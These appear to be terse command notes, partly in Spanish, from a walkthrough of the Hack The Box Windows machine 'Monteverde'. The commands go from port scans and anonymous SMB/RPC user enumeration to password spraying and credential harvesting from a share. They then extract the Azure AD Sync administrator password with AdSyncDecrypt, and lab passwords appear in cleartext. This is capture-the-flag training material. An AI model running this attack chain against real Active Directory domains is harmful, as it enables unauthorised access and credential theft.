Monteverde

Monteverde


HTB Windows

nmap -A -p- -oA monteverde 10.10.10.172 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA monteverde 10.10.10.172

nmap -sU -O -p- -oA monteverde-udp 10.10.10.172


whichSystem 10.10.10.172

nmap -p- --open -T5 -v -n 10.10.10.172

echo "10.10.10.172 monteverde.htb MEGABANK.LOCAL" | sudo tee -a /etc/hosts

ssh_command.

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.172 -oG allPorts

ssh_command.

extractPorts allPorts

nmap -sCV -p53,88,135,139,389,445 10.10.10.172 -oN targeted

ssh_command.

bc targeted -l rb

crackmapexec smb 10.10.10.172 --shares

smbclient -L 10.10.10.172 -N

smbmap -H 10.10.10.172 -u ""

ssh_command.

rpcclient -U "" 10.10.10.172 -N -c "enumdomusers"

rpcclient -U "" 10.10.10.172 -N -c "enumdomgroups"

ssh_command.

querydispinfo

ssh_command.

rpcclient -U "" 10.10.10.172 -N -c "enumdomusers" | grep -oP '\[.*?\]' | grep -v '0x' | tr -d '[]' > users.txt

ssh_command.

GetNPUsers MEGABANK.LOCAL/ -no-pass -usersfile users.txt

crackmapexec smb 10.10.10.172 -u users.txt -p users.txt --continue-on-success

ssh_command.

crackmapexec smb 10.10.10.172 -u 'SABatchJobs' -p 'SABatchJobs' --shares

ssh_command.

smbmap -H 10.10.10.172 -u 'SABatchJobs' -p 'SABatchJobs'

smbmap -H 10.10.10.172 -u 'SABatchJobs' -p 'SABatchJobs' -r azure_uploads

ssh_command.

smbclient //10.10.10.172/azure_uploads -U "SABatchJobs%SABatchJobs"

ssh_command.

smbmap -H 10.10.10.172 -u 'SABatchJobs' -p 'SABatchJobs' -r 'users$'

ssh_command.

smbmap -H 10.10.10.172 -u 'SABatchJobs' -p 'SABatchJobs' --download 'users$/mhope/azure.xml'

cat azure.xml

ssh_command.

ssh_command.

crackmapexec winrm 10.10.10.172 -u 'SABatchJobs' -p 'SABatchJobs'

crackmapexec smb 10.10.10.172 -u users.txt -p passwords.txt

ssh_command.

crackmapexec winrm 10.10.10.172 -u users.txt -p passwords.txt

cat passwords.txt

ssh_command.

evil-winrm -i 10.10.10.172 -u 'mhope' -p '4notherD4y@nother$'

ssh_command.

type user.txt

ssh_command.

whoami /priv

ssh_command.

net user mhope

ssh_command.

whoami /all

ssh_command.

dir

ssh_command.

https://github.com/VbScrub/AdSyncDecrypt/releases/tag/v1.0

Bajamos el archivo AdDecrypt.zip

ssh_command.

upload AdDecrypt.exe

upload mcrypt.dll

ssh_command.

cd "Program Files\Microsoft Azure AD Sync\Bin"

C:\Windows\Temp\Privesc\AdDecrypt.exe -FullSQL

ssh_command.

crackmapexec winrm 10.10.10.172 -u users.txt -p passwords.txt

ssh_command.

evil-winrm -i 10.10.10.172 -u 'Administrator' -p 'd0m@ain4dminyeah!'

ssh_command.

type root.txt

ssh_command.
